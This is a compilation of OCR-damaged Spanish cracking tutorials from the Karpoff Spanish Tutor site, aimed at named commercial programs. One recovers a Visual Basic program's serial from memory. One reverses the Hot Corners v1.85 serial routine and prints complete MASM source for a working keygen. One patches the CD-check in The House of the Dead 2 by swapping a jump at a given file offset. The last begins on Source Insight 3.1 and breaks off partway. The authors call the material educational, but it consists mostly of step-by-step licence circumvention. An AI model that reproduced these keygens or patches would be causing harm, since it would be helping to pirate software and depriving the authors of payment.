:0043B4A7 83C428 add esp, 00000028 

:0043B4AA 6685DB test bx, bx 

:0043B4AD 0F84C8020000 je 0043B77B <= Aqui caemos 
:0043B4B3 8D458BC lea eax, dword ptr [ebp-44] 
:0043B4B6 50 push eax 


De acuerdo ya encontramos las primeras coincidencias sobre ellas y vemos que hay un salto condicional que 
hace referencia desde 0043B424 como la rutina __ vbaStrCmp está abajo quiere decir que o por lo menos así 
lo pienso que debería poner un bpx mejor en 0043B424 para que salte TRW cuando llegue a ese punto. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0043B424(C) <= Vamos a poner un punto de ruptara aqui... 


| 
:0043B437 FF75A8 push [ebp-58] 
:0043B43A FF75A4 push [ebp-5C] 


* Reference To: MSVBVM60.__vbaStrCmp, Ord:0000h 


| 

:0043B43D E8F86AFCFF Call 00401F3A 
:0043B442 FF759C push [ebp-64] 
:0043B445 8BD8 mov ebx, eax 
:0043B447 F7DB neg ebx 

:0043B449 1BDB sbb ebx, ebx 
:0043B44B 688C824100 push 0041828C 
:0043B450 43 inc ebx 

:0043B451 F7DB neg ebx 


* Reference To: MSVBVM60.__vbaStrCmp, Ord:0000h 


| 

:0043B453 E8E26AFCFF Call 00401F3A 
:0043B458 FF75A0 push [ebp-60] 
:0043B45B F7D8 neg eax 


Cargamos el programa en TRW y ponemos el bpx 0043B424, regresamos al programa he ingresamos nuestro 
Nombre y Código y hacemos clic en Registrar y automáticamente salta el TRW aquí... 


0043B424 JNL 0043B437 

0043B426 PUSH DWORD AO 

0043B42B PUSH DWORD 00418278 

0043B430 PUSH EBX 

0043B431 PUSH EAX 

0043B432 CALL MSVBVM60!__ vbaHresultCheckObj 

0043B437 PUSH DWORD [EBP-58] 

0043B43A PUSH DWORD [EBP-5C] 

0043B43D CALL MSVBVM60!__ vbaStrCmp <= Aqui entramos 
0043B442 PUSH DWORD [EBP-64] 


Luego que hemos entrado a la llamada con F8 vamos al salto con F10 


00401F34 JMP NEAR [00401170] 
00401F3A JMP NEAR [004010D4] <= Saltamos 
00401F40 JMP NEAR [0040101C] 


Ya en el salto nos encontraremos con estas otras opciones entramos en 660470E0 que apunta a una rutina en 
el archivo OLEAUT32.dll en donde se hará la comparación del serial bueno y el maloso. 


6602470F RET 

MSVBVM60!__vbaStrCmp 

66024710 PUSH DWORD [ESP+08] 

66024714 PUSH DWORD [ESP+08] 

66024718 PUSH BYTE +00 

6602471A CALL MSVBVM60!__ vbaStrCmp 
6602471F RET 

MSVBVM60!__vbaStrCmp 

66024722 CMP DWORD [ESP+04],BYTE +02 
66024727 JZ NEAR 660470E0 <= No entramos 
6602472D PUSH DWORD 00030001 

66024732 PUSH DWORD [ESP+08] 

66024736 PUSH DWORD [ESP+10] 

6602473A PUSH DWORD [ESP+18] 

6602473E CALL OLEAUT32!VarBstrCmp <= Entramos 
66024744 TEXT EAX,EAX 


Aqui nos encontramos dentro de las entrañas del OLEAUT32 justo en la rutina VarBstrCmp 


7FFO2E2B JMP SHORT 7FFO2E17 
OLEAUT32!VarBstrCmp 
7FFO2E2D PUSH EBP 

7FFO2E2E MOV EBP,ESP 
7FF02E30 PUSH ECX 

7FF02E31 PUSH EBX 

7FF02E32 PUSH ESI 

7FF02E33 MOV ESI,EBP+08 
7FFO2E36 PUSH EDI <= Chequeamos el valor de ESI 
7FF02E37 TEST ESI,ESI 
7FFO2E39 JNZ 7FFO2E87 


Al chequear el valor contenido en ES| con el comando D ES! nos encontramos lo siguiente... será nuestro 
serial, ¡CLARO! ni más ni menos, ¿que por qué está separado?, cómo sé que hoy si ya te leístes el manual de 
SiLvEr StOrM con título "Crackeando Programas en Visual Basic" sé que ya lo comprendes y sabes que es por 
culpa de la rutina MultiByteToWideChar. 


00471A0C 4E 00 4E 00 4E 00 4E 00-2D 00 41 00 30 00 33 00 N.N.N.N.-.A.0.3. 
00471A1C 38 00 2D 00 33 00 41 00-46 00 41 00 2D 00 36 00 8.-.3.A.F.A.-.6. 
00471A2C 33 00 31 00 31 00 00 00-00 00 00 00 CD E5 0D AO 3.1.1....... -0.á 


00471A3C 0C 00 45 00 3C 00 45 00-00 00 00 00 00 00 00 00 ..E.<.E......... 


Luego que hayas ingresado el serial correcto verás que un archivo nuevo llamado reg.ec se ha creado en 
donde encontrarás la información que ingresastes en mi caso me aparece... 


ByTESCRK 
NNNN-A038-3AFA-6311 


NOTA IMPORTANTE: Tienes que localizar por tu propia cuenta el serial correcto, he quitado a propósito los 
primeros cuatro caracteres alfanuméricos, ¿que querías el serial correcto? solo así, ¡no hombre! si no, no 
tiene chiste y sentiría que es por gusto el tiempo dedicado a este tuto, además me sentiría mal pués no 
estaría colaborando a tu desarrollo intelectual en este fino arte del cracking y además recordarte que... 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de 
manera educacional y tambien como diversión, si te ha gustado, este producto por favor 
COMPRALO, algunas veces... los autores merecen su dinero ;o)" 


Saludos a mis buenos amigos Karpoff, Profesor_X, CaoS ReptantE y a todos los crackers hispanohablantes, 
gracias por una vez más has llegado hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRKOiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 1999-2002 


Hot Corners vl1.85 


Name / Serial 


Hacer un Keygen 


Hot Corners permite que usted rapidamente active o desactive su Screen Saver al mover 
el ratón a cualquier esquina de su pantalla. 


Novato. 


http://www. SouthByPC.com 


TRW2000, W32dasm 


ByTESCRK FECHA: 25/11/2001 


INTRODUCCION 


Estas utilerías son muy bonitas, por lo menos a mi me gustan, una de las mejores es SuperCleaner 
(la manera de generar el serial para ese programa es diferente a la de este). 


Este programa lo que hace es como lo detallo en la descripción, vayamos a lo nuestro y empecemos. 


Si quieres más información sobre SuperCleaner verifica el tuto de mi buen amigo 
CaoS ReptantE de nombre "Parches Inteligentes”. 


AL ATAKE 


Primero carguemos el programa y hagamos clic en el botón Enter Registration y en Name: y Code: 
Ingresemos los valores que deseemos, hacemos clic en Ok y nos aparece una MessageBox conteniendo el 
mensaje siguiente 


Sorry, you have entered an incorrect registration code. 


Salgamos y abramos nuestro W32DASM y veamos los References Strings y busquemos la cadena de texto 
anterior y caemos aqui... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004030EF(C) <= Investigamos aqui... 


| 
:00403137 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"Hot Corners" 


| 
:00403139 6880B04000 push 0040B080 


* Possible StringData Ref from Data Obj ->"Sorry, you have entered an incorrect " 
->"registration code." 


| 
:0040313E 68F0B24000 push 0040B2F0 
:00403143 56 push esi 


* Reference To: USER32.MessageBoxA, Ord:01C3h 


| 

:00403144 FF1548914000 Call dword ptr [00409148] 
:0040314A B801000000 mov eax, 00000001 
:0040314F 5E pop esi 

:00403150 81C400020000 add esp, 00000200 
:00403156 C21000 ret 0010 


Nos vamos a ir a 004030EF y caemos aquí... 


* Possible Reference to Dialog: DialoglD_006F, CONTROL_ID:03FC, "" 


| 

:004030CF 68FC030000 push 000003FC 

:004030D4 56 push esi 

:004030D5 FFD7 call edi 

:004030D7 8D442408 lea eax, dword ptr [esp+08] 

:004030DB 8D8C2408010000 lea ecx, dword ptr [esp+00000108] 
:004030E2 50 push eax 

:004030E3 51 push ecx 

:004030E4 E857020000 call 00403340 <= Vamos a entrar aqui 
:004030E9 83C408 add esp, 00000008 

:004030EC 84CO0 test al, al 

:004030EE 5F pop edi 

:004030EF 7446 je 00403137 <= Aqui caemos 

:004030F1 8D542404 lea edx, dword ptr [esp+04] 

:004030F5 8D842404010000 lea eax, dword ptr [esp+00000104] 
:004030FC 52 push edx 

:004030FD 50 push eax 


* Possible StringData Ref from Data Obj ->"Softwarel Hot Corners Configuration" 


:00403340 8B4C2404 mov ecx, dword ptr [esp+04] <= Aqui caemos 
:00403344 81EC00010000 sub esp, 00000100 

:0040334A 8D442400 lea eax, dword ptr [esp] 

:0040334E 53 push ebx 

:0040334F 50 push eax 

:00403350 51 push ecx 

:00403351 32DB xor bil, bl 

:00403353 E8A8000000 call 00403400 <= Se genera el serial, entramos... 
:00403358 8B842414010000 mov eax, dword ptr [esp+00000114] 
:0040335F 83C408 add esp, 00000008 

:00403362 8D542404 lea edx, dword ptr [esp+04] 

:00403366 52 push edx <= Se puede ver el serial correcto (d edx) 
:00403367 50 push eax <= Nuestro serial malo (d eax) 


* Reference To: KERNEL32.IstrempA, Ord:0329h <= El serial se compara en el Kernel32, problemas si queremos 


parchar 


| 

:00403368 FF1500914000 Call dword ptr [00409100] 
:0040336E 85C0 test eax, eax 

:00403370 B001 mov al, 01 

:00403372 7402 je 00403376 

:00403374 8AC3 mov al, bl 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00403372(C) 


| 

:00403376 5B pop ebx 

:00403377 81C400010000 add esp, 00000100 
:0040337D C3 ret 


Ahora vayamos a TRW2000 y en el botón Browse seleccionamos el archivo a ejecutar hacemos clic en Load y 
aparece la ventana de depuración, ahora pongamos un punto de ruptura en 00403400, con Ctrl+N nos 
aparece la ventana del programa y se quita la de depuración, ingresamos los valores en Name ByTESCRK y 
Code 19770424 y hacemos clic en Ok, automáticamente nos aparece otra vez la ventana de TRW y empieza 
el traceo... 


:00403400 81EC00010000 sub esp, 00000100 
:00403406 A048DA4000 mov al, byte ptr [0040DA48] 
:0040340B 53 push ebx 

:0040340C 55 push ebp 

:0040340D 56 push esi 


:00403429 AA stosb 
:0040342A 8B9C2414010000 mov ebx, dword ptr [esp+00000114] <= Nuestro nombre 
:00403431 B940000000 mov ecx, 00000040 


:00403446 B86A000000 mov eax, 0000006A <= EAX recibe el valor de 6Ah 
:0040344B 8BF1 mov esi, ecx 

:0040344D 33C9 xor ecx, ecx 

:0040344F 85F6 test esi, esi 

:00403451 7E0C jle 0040345F 

:00403453 0FBE1419 movsx edx, byte ptr [ecx+ebx] <= Extrae letra por letra 
:00403457 41 inc ecx <= Incrementa ECX en 1 

:00403458 3BCE cmp ecx, esi <= Compara la longitud del nombre 
:0040345A 8D0450 lea eax, dword ptr [eax+2*edx] <= EAX = EAX + EDX * 2 
:0040345D 7CF4 j¡l 00403453 <= Si es menor regresa a 00403453 
:0040345F 8B3D98914000 mov edi, dword ptr [00409198] 

:00403465 50 push eax 

:00403466 8D442414 lea eax, dword ptr [esp+14] 

:0040346A 683CB34000 push 0040B33C 

:0040346F 50 push eax 

:00403470 FFD7 call edi <= Agrega un guión a nuestro número ej. NNNN- 
:00403472 83C40C add esp, 0000000C 

:00403475 8D4C2410 lea ecx, dword ptr [esp+10] 

:00403479 51 push ecx 

:0040347A 55 push ebp 

:0040347B FF15E0904000 Call dword ptr [004090E0] 

:00403481 33C0 xor eax, eax 

:00403483 B96A000000 mov ecx, 0000006A <= ECX recibe el valor de 6Ah 
:00403488 85F6 test esi, esi 

:0040348A 7EOF jle 0040349B 

:0040348C 0FBE1418 movsx edx, byte ptr [eax+ebx] <= Extrae letra por letra 
:00403490 40 inc eax <= Incrementa EAX en 1 

:00403491 8D1492 lea edx, dword ptr [edx+4*edx] <= EDX = EDX + EDX * 4 
:00403494 3BC6 cmp eax, esi <= Compara la longitud del nombre 
:00403496 8DOC91 lea ecx, dword ptr [ecx+4*edx] <= ECX = ECX + EDX * 4 
:00403499 7CF1 jl 0O040348C <= Si es menor regresa a 0040348C 
:0040349B 51 push ecx 

:0040349C 8D442414 lea eax, dword ptr [esp+14] 

:004034A0 683CB34000 push 0040B33C 

:004034A5 50 push eax 

:004034A6 FFD7 call edi <= Agrega un guión a nuestro número ej. 13046- 
:004034A8 83C40C add esp, 0000000C 


:004034AB 8D4C2410 lea ecx, dword ptr [esp+10] 

:004034AF 51 push ecx 

:004034B0 55 push ebp 

:004034B1 FF15E0904000 Call dword ptr [004090E0] <= Concatena los valores ej. NNNN-13046- 
:004034B7 OFBE441EFF movsx eax, byte ptr [esi+ebx-01] <= Extrae la última letra, en mi caso K 
:004034BC 8D1480 lea edx, dword ptr [eax+4*eax] <= EDX = EAX + EAX * 4 

:004034BF 8D0450 lea eax, dword ptr [eax+2*edx] <= EAX = EAX + EDX * 2 

:004034C2 8D542410 lea edx, dword ptr [esp+10] <= EDX recupera el valor 13046- 

:004034C6 8D4C0001 lea ecx, dword ptr [eax+eax+01] <= ECX = EAX + EAX + O1 

:004034CA 51 push ecx 

:004034CB 683CB34000 push 0040B33C 

:004034D0 52 push edx 

:004034D1 FFD7 call edi <= Agrega un guión a nuestro número ej. 1651- 

:004034D3 83C40C add esp, 0000000C 

:004034D6 8D442410 lea eax, dword ptr [esp+10] 

:004034DA 50 push eax 

:004034DB 55 push ebp 

:004034DC FF15E0904000 Call dword ptr [004090E0] <= Concatena los valores ej. NNNN-13046-1651- 
:004034E2 OFBE4C1EFF movsx ecx, byte ptr [esi+ebx-01] <= Extrae la última letra 

:004034E7 8D442410 lea eax, dword ptr [esp+10] <= EAX recupera el valor 1651- 

:004034EB 8D148D1D000000 lea edx, dword ptr [4*ecx+0000001D] <= EDX = ECX * 4 + 1Dh 
:004034F2 52 push edx 

:004034F3 6838B34000 push 0040B338 

:004034F8 50 push eax 

:004034F9 FFD7 call edi 

:004034FB 83C40C add esp, 0000000C 

:004034FE 8D4C2410 lea ecx, dword ptr [esp+10] 

:00403502 51 push ecx 

:00403503 55 push ebp 

:00403504 FF15E0904000 Call dword ptr [004090E0] <= Concatena los valores NNNN-13046-1651-329 
:0040350A 5F pop edi 

:0040350B 5E pop esi 

:0040350C 5D pop ebp 

:0040350D 5B pop ebx 

:0040350E 81C400010000 add esp, 00000100 

:00403514 C3 ret 


la) A A 


Nombre 
| ByTESCRK 
Serial 


| NNNN-13046-1651-329 


ww, SouthByPC.corm 


Y aqui tienen el código fuente en MASM... 


.386 
.model flat,stdcall 
option casemap: none 


include c:1masm321includelwindows.inc 
include c:1masm32Vincludeluser32.inc 
include c:1masm32Vincludel kernel32.inc 
includelib c:1masm321libluser32.!lib 
includelib c:1masm321liblkernel32.lib 


.const 


IDD_DIALOG EQU 1000 
IDC_NAME EQU 1001 
IDC_ SERIAL EQU 1002 
IDC_GEN EQU 1003 
IDC_ COPY EQU 1004 


DigFunc PROTO : DWORD,: DWORD,: DWORD,: DWORD 
Operacion PROTO 

Decimal PROTO 

Clipo PROTO hWnd: HWND 


.data 


nombre db 64 dup(0),0 

serial db 8 dup(0),0 

nada db 20 dup(0),0 

Icono db "keygen",0 
Iconimage db "keygen",0 
minombre db "ByTESCRK",0 
titulo db "Hot Corners v1.85",0 
copiado db "¡El serial ha sido copiado al portapapeles!",0 
hiInstance dd O 

hicon dd O 

buff db 256 dup(?) 

hWnd HWND ? 


.code 
start: 


invoke GetModuleHandle, NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance,I|DD_DIALOG,NULL,addr DlgFunc, NULL 
invoke ExitProcess, NULL 


DigFunc proc hDlg: DWORD,uMsg: DWORD, wParam: DWORD, IParam: DWORD 


ff uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd,eax 
invoke Loadlcon,hInstance,addr Icono 
mov hlcon,eax 
invoke SendMessage, hDlg, WM_SETICON,1,hlcon 
invoke SetDlgltemText,hDlg,I|DC_NAME,ADDR minombre 
.elseif uUMsg==WM_CLOSE 
invoke EndDialog,hDlg, NULL 
.elseif uUMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 
If dx==BN_CLICKED 
Ifax==|DC_COPY 
invoke Clipo,hDlg 
.elseif ax==IDC_GEN 
invoke GetDlgltemText,hDlg,I|DC_NAME,ADDR nombre, 64 


invoke Operacion 


.lfeax!=1 
invoke SetDlgltemText, hDlg,IDC_SERIAL,ADDR serial 
invoke SetDlgltemText,hDlg,IDC_NAME,ADDR nombre 
invoke Clipo,hDlg 
invoke MessageBox,hDlg,ADDR copiado,ADDR titulo, MB_ICONINFORMATION 
invoke SetFocus,|DC_NAME 


.endif 
ret 
.endif 
.endif 
.endif 
ret 


DigFunc endp 
Operacion proc 


invoke Istrlen,ADDR nombre ;Contamos el tamaño del nombre 


pushad 


mov edi, offset nombre ¡Guardamos el nombre 

mov esi, offset serial ;Se guardará el serial 

mov ebx, eax 

push ebx 

mov dword ptr[esi], 4E4E4E4Eh ;Primeros caracteres NNNN 
add esi,3 ; Agrega tres espacios al serial 

jmp enes ;Va a la rutina enes 

mov ecx, 6Ah ¡Mueve el valor 6Ah a ECX 

xor eax,eax 


pasol: movsx edx, byte ptr [edi+eax] ;Extraemos letra por letra 
inc eax 
lea ecx, dword ptr [ecx+2*edx] 
cmp eax, ebx 
jl paso1 ;Hasta finalizar 


If ecx < 3E8h ;Chequeamos el valor para transformar a decimal 
add esi, 2 

.else 
add esi, 3 

.endif 


mov eax, ecx 

invoke Decimal ;Invocamos la rutina Decimal 
enes: add esi,1 

mov dword ptr[esi],2Dh ;Agrega un guión 

pop ebx 

xor eax,eax 

push ebx 

mov ecx, 6Ah ¡Mueve el valor 6Ah a ECX 


paso2: movsx edx, byte ptr [edi+eax] ;Extraemos letra por letra 
inc eax 
lea edx, dword ptr [edx+4*edx] 
lea ecx, dword ptr [ecx+4* edx] 
cmp eax, ebx 
jng paso2 ;Hasta terminar 


If ecx < 2710h 
add esi, 4 
.else 
add esi,5 
.endif 


mov eax, ecx 
invoke Decimal 

add esi,1 

mov dword ptr[esi],2Dh ;Agregamos otro guión 
pop ebx 

xor eax,eax 

push ebx 


movsx eax, byte ptr [edi+ebx-01] ;Extraemos última letra 
lea edx, dword ptr [eax+4*eax] 

lea eax, dword ptr [eax+2*edx] 

lea ecx, dword ptr [eax+eax+01] 


If ecx < 3E8h 
add esi, 3 
.else 
add esi, 4 
.endif 


mov eax, ecx 
invoke Decimal 

add esi,1 

mov dword ptr[esi],2Dh ;Otro guión 
pop ebx 

mov eax,1Dh 


movsx edx, byte ptr [edi+ebx-01] ;Extraemos la última letra 
lea ecx, dword ptr [4*edx+eax] 


If ecx < 3E8h 
add esi, 3 
.else 
add esi, 4 
.endif 


mov eaX, ecx 
invoke Decimal 


popad 

ret 
Operacion endp 
Decimal proc 


xor ebx, ebx 
mov ecx, 10 
dividir: 
xor edx, edx 
idiv ecx 
add dl, 30h 
mov byte ptr [esi+ebx], dl 
dec ebx 
If eax>9 
jmp dividir 
.endif 
add al, 30h 
mov byte ptr [esi+ebx], al 
ret 


Decimal endp 


Clipo proc hDlg: DWORD 
LOCAL gmem : DWORD 


invoke GlobalAlloc, GMEM_ MOVEABLE+GMEM_DDESHARE, 254 
mov gmem,eax 


invoke GlobalLock,eax 
cmp eax,NULL 

je noabra 

mov ebx, offset serial 
lea esi,dword ptr[ebx] 
mov edi,eax 

mov ecx,29 


rep movsb 


invoke OpenClipboard, hDlg 
cmp eax, TRUE 
jne noabra2 


mov eax,gmem 
invoke SetClipboardData,CF_TEXT, eax 


invoke CloseClipboard 


noabra2: 
mov eax,gmem 
invoke GlobalFree,eax 


noabra: 
ret 
Clipo endp 


End Start 


Ahora ya podemos usar el programa de manera más libre, aunque sin embargo quiero que recuerdes, lo de 
siempre... 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de 
manera educacional y tambien como diversión, si ha USTED, le gusta el producto por favor 
COMPRELO, algunas veces... los autores merecen su dinero ;o)" 


Saludos a mis buenos amigos Karpoff, Profesor_X, CaoS ReptantE (gracias por tus consejos y ayuda en la 
realización de este tuto) y a todos los crackers hispanohablantes, en especial a ti por que has llegado hasta 
una vez más hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRKOiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 


Programa: The House of the Dead 2 

PROTECCION: CD-Check 

Objetivo: Matar el Cd-CHeck 

Descripcion: Se trata de un juego mu chulo donde matas a un taco de mostruitos, xDDD 

Dificultad: Newbie 

DOWNLOAD : 2299997 

Herramientas: W32Dasm, Soft-lce y Hex WorkShop 

CRACKER: AuspeX FECHA: 01/04/2002 
INTRODUCCION 


Aquí tenemos un jueguesito, sinceramente, el primer juego que crackeo, hasta ahora siempre había crackeado 
programas (juego muy poco, jeje), pero es que este me lo había dejado un colega, y como tenía que pagarle el CD 
entonces pensé que mejor intentaba crackearlo y yo se lo devolvía (no podeis imaginar hasta que punto soy un 
agarrao, ajajaaja). Así que este tuto se lo dedico a mi colega Dani: ¡va por ti DANI! 


The House of the Dead, bonito juego, y estupida protección la verdad sea dicha. Creo que los programadores 
encargados de protegerlo no se han exprimido demasiado la cabeza, así que habrá que enseñarles a esta panda de 
burros por donde se les puede meter mano a sus productos, y que programen mejor el CD-Check 


AL ATAKE 


Lo primero que hacemos es instalar el juego. Luego nos damos el lote de jugar para descargar adrenalina matando zombies, 
y una vez desahogados por completo nos metemos al tajo. Quitamos el CD e intentamos ejecutar de nuevo: 


AN Please insert the The House of The Dead 2' CD. 


¿ Cancelar | 


¿Típico verdad?, pués manos a la obra. Vamos a entrar en el Sice y colocamos un breakpoint en la API MessageBoxA (acerté 
a la primera, jaja), le damos a reintentar a ver que sucede... Revienta el sice justo en la llamada (picó el anzuelo). Salimos de 
la llamada pulsando F12 y nos encontramos con todo este código (código abierto con el W32Dasm, no se puede copiar la 
ventana del sice): 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004A5CB7(C) 
| 


:004A5D22 FFD5 call ebp <-----aquí se llama al mensajito de error (falta el CD) 

:004A5D24 6A00 push 00000000 

:004A5D26 8BFO mov esi, eax 

:004A5D28 FFD3 call ebx 

:004A5D2A 83FE02 cmp esi, 00000002 <-----comprueba a ver si hemos cancelado 

:004A5D2D 7421 je 004A5D50 <----- salta si se ha pulsado cancelar (2 he visto que es cancelar y 4 reintentar) 
:004A5D2F E964FFFFFF ¡mp 004A5C98 <-----se intenta de nuevo 


ERARAAAAKA RARA RARA AA ARA ARKAAAKAAARK AAA KARA ARA RRA AAA KA AAA ARK AAA AA RARA AA KA AAA 


Ahora os pondré todo el código de los alrededores desde donde se salta a esta zona de chico malo, para que se pueda 
comprender como hace el programa para chequear el CD-ROM. Si os marea un poco la cabeza no mireis, por supuesto no lo 
pienzo explicar todo al detalle, sólo lo más importante: 


* Reference To: KERNEL32. CreateFileA, Ord:0034h <-----más abajo veremos para que utiliza esta API 


| 
:004A5C86 8B3D80304C00 mov edi, dword ptr [004C3080] 


* Reference To: USER32.ShowCursor, Ord:0266h <-----no tengo ni idea para que la utiliza 


| 
:004A5C8C 8B1D48324C00 mov ebx, dword ptr [004C3248] 


* Reference To: USER32.MessageBoxA, Ord:O1BEh 


| 

:004A5C92 8B2DFC314C00 mov ebp, dword ptr [004C31FC] <-----coloca la dirección de MessageBoxA en este registro para 
luego, si hace falta jodernos un poquito con su puñetero mensaje de error (recordad el CALL EBP de arriba que sacaba 
nuestro mensaje de error) 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004A5D2F(U) 


| 

:004A5C98 8D442410 lea eax, dword ptr [esp+10] 
:004A5C9C 50 push eax 

:004A5C9D 6800010000 push 00000100 


* Reference To: KERNEL32, GetLogicalDriveStringsA, Ord:011Eh 


| 

:004A5CA2 FF1504314C00 Call dword ptr [004C3104] <-----llamada que obtiene una cadena con las unidades válidas que 
existen en el ordenata, en mi caso: a: c:1 d:1 e: (a -> disquetera, c,d -> disco duro, e -> cd-rom) 

:004A5CA8 85CO0 test eax, eax 

:004A5CAA 0F84A0000000 je 004A5D50 


:004A5CBO 8D742410 lea esi, dword ptr [esp+10] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004A5DOB(U) 


| 

:004A5CB4 803E00 cmp byte ptr [esi], 00 <-----comprueba si ha terminado de checkear todas las unidades válidas 
:004A5CB7 7454 je 004A5DO0D <-----saltamos a la zona de chico malo (nos manda al carajo) 

:004A5CB9 56 push esi <-----mandamos como parámetro la dirección de la letra de la unidad que estamos checkeando 


* Reference To: KERNEL32.GetDriveTypeA, Ord:0104h 


| 

:004A5CBA FF15003140C00 Call dword ptr [004C3100] <-----obtenemos un valor en eax que indica la unidad 

:004A5CC0 83F805 cmp eax, 00000005 <-----comprueba si la unidad es cd-rom (0,1 -> ni puta idea, 2 -> disquete, 3 -> 
disco duro, 4 -> unidad de red, 5 -> cd-rom). Esta comprobación es muy interesante 

:004A5CC3 7538 ¡ne 004A5CFD <----- salta si no coincide 

:004A5CC5 8B0D90C87D00 mov ecx, dword ptr [007DC890] 

:004A5CCB 51 push ecx 

:004A5CCC 56 push esi 


* Possible StringData Ref from Data Obj ->"%s%s" 


| 

:004A5CCD 6844765900 push 00597644 

:004A5CD2 6858CF7D00 push 007DCF58 

:004A5CD7 E8BF680000 call 004AC59B 

:004A5CDC 83C410 add esp, 00000010 

:004A5CDF 6A00 push 00000000 

:004A5CE1 6880000000 push 00000080 

:004A5CE6 6A03 push 00000003 <-----creo que es un parámetro que indica que el archivo ha de estar ahí por cojones, pero 
no esoty seguro de esto 

:004A5CE8 6A00 push 00000000 

:004A5CEA 6A00 push 00000000 

:004A5CEC 6800000080 push 80000000 <-----lectura del archivo 

:004A5CF1 6858CF7D00 push 007DCF58 <----- manda la dirección de esta cadena: unidad:1Hod2.ico ???? luego explicaré 
esto, que realmente es la clave de todo este royo 

:004A5CF6 FFD7 call edi <----- llamada a CreateFileA 

:004A5CF8 83F8FF cmp eax, FFFFFFFF <-----si el archivo no está ahí, devuelve -1 en eax = FFFFFFFF 

:004A5CFB 7537 ¡ne 004A5D34 <-----si la cosa ha salido bien, salimos de la rutina y se ejecuta el juego 


SEAS 


Bueno, explicaré un poco lo que se puede hacer, pero una vez entendido todo el código de arriba, la cosa es facil, no?. Si 
más o menos lo habeis comprendido, nos damos cuenta de que checkea las unidades una por una hasta llegar a la unidad de 
CD-ROM. Cuando ve que la letra E (en mi caso) es dicha unidad busca en ella el archivo de icono Hod2.ico en la dirección E:X 

pero como dicho archivito no está por que no hay CD que valga pos nos manda al carajo. Bueno, pués cambiemos ese J NE 
por un ] MP para que salte siempre, esté o no el archivo en la dirección especificada, y sea cual sea la unidad donde esté 
mirando. Otra solución sería que en vez de comprobar con 00000005 compruebe con 00000003 (disco duro) y coloquemos el 
archivo Hod2.ico en la unidad c:1, pero sinceramente, ¿quien quiere hacer esta tontería?. Pués ya está, lo demas no tengo 
ganas de explicarlo, ya sabeis, lo de cambiar los bytes con el Hex WorkShop y to el royo ese, hacedlo ustedes, ¡VAGOSSSSS!. 
Bueno, lo explicaré, ya sabeis, pillamos el offset con el W32Dasm y abrimos Hex WorkShop, buscamos por offset: A5CFBh y 
cambiamos 7537 ¡ne por 7437 je. 


FINALIZANDO 
Hay un monstruo que no consigo matar, uno que hay en la fase 4 con una cierra mecánica, creo que es en esa fase, jeje. 


Bueno, para finalizar doy las gracias al grupo KFOR, a Karpoff y a todos los crackers que escriben tutoriales en sus páginas, 
por enseñarme todo lo que se y de los que aun puedo aprender muchísimo: GRACIAS A TODOS 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 1999-2002 


Source Insight v3.1 


Name / Serial, Limitacion de Tiempo 
Extraer el serial 


Un bello programa para escribir otros programas en código fuente 
con resaltado de sintaxis. Sencillamente me encanta. 


Novato 


http://www.sourceinsight.com 


TRW2000 W32dasm file insPEctor 


ByTESCRK FECHA: 05/03/2002 


INTRODUCCION 


Después de hace algún tiempo, casi tres meses de descanso en este aspecto, creo que he salido de 
invernar y aquí vamos nuevamente a la carga, para poner a su disposición un tuto más. 


La verdad es que no tengo ninguna inspiración para escribir una introducción solo sé decirles que 
este programa es muy bueno y lo mejor aún es que la generación del serial es bastante sencilla, 
hubiese preferido que fuera más fácil al principio puesto que en lo que yo se los presento aquí, ya me 
había llevado un día pensando, sin embargo la solución es bastante sencilla. 


Creo que por el momento hemos llegado al final de la intro y por lo tanto procedemos.... 


AL ATAKE 


Primeramente veremos como está formada nuestra pequeña victima. Abrimos el file insPEctor de ViPER y 
procedemos a buscar la carpeta en donde instalamos el programa y procedemos a analizarlo, hacemos clic en 
la pestaña Compilador y vemos que está hecho con Microsoft Visual C++ 6.0 y no está comprimido. 
Cargamos el programa y vemos que aparece una ventanita para registrarnos pero unicamente nos aparece 
un campo para ingresar el serial y cuatro botones (Ok, Exit, Try it, Buy it...), vamos a ingresar un valor 
cualquiera para el serial en mi caso los de siempre 19770424, hacemos clic en el botón de Ok y nos aparece 
una MessageBox con la cadena siguiente "You typed an invalid serial number", ya que tenemos esta 
información que es suficiente para nosotros nos vamos al W32DASM y descompilamos a nuestra victima para 
buscar esta cadena y ver desde donde procede el mensaje. Cuando ya lo tengamos vamos a las References 
Strings y buscamos la cadena, nos encontraremos con esto. 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:0043CADA(C), :0043CAF9(C), :0043CB38(C), :0043CB56(C), :0043CB67(C) 
|:0043CB86(C), :0043CB9E(C), :0043CBB8(C) 


* Possible StringData Ref from Data Obj ->"You typed an invalid serial number." 


| 
:0043CC30 68D4F74F00 push 004FF7D4 <= Si hacemos dobleclic caemos aqui... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
